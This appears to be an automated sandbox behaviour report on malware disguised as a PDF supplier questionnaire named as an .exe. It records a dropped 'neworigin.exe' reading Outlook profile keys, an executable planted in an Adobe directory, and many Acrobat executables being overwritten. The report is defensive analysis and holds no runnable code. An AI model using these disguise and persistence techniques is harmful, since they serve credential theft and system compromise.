Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
Source: NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Static file information: File size 2777600 > 1048576
Source: NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x14de00
Source: NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Static PE information: section name: .reloc entropy: 7.931625250013023

Persistence and Installation Behavior
barindex
Creates files in the system32 config directory
Source: C:\Windows\System32\alg.exe File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\52b8592e4ce608d8.bin
Drops executable to a common third party application directory
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
